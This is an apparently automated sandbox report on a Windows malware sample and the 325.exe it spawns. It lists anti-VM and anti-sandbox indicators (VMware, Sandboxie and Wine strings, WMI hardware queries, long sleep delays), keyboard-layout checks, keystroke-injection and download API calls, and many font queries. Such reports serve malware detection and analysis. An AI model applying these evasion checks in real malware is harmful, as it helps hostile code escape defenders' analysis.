                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Yara detected AntiVM3
                    Source: Yara match File source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: 325.exe PID: 4796, type: MEMORY
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\325.exe Window / User API: threadDelayed 440
                    Source: C:\Users\user\AppData\Roaming\325.exe Window / User API: threadDelayed 7193
                    Source: C:\Users\user\AppData\Roaming\325.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 3868 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 5044 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 5644 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 3348 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es)
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2390 FindFirstFileW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D792 FindFirstFileW,GetLastError,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: vmware
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: kS2dqbsDwD.exe Binary or memory string: Hyper-V RAW
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMWARE
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\325.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage,
                    Source: C:\Users\user\AppData\Roaming\325.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\AppData\Roaming\325.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140062600 mouse_event,
                    Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path}
                    Source: kS2dqbsDwD.exe Binary or memory string: Program Manager
                    Source: kS2dqbsDwD.exe Binary or memory string: Shell_TrayWnd
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: %-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\325.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
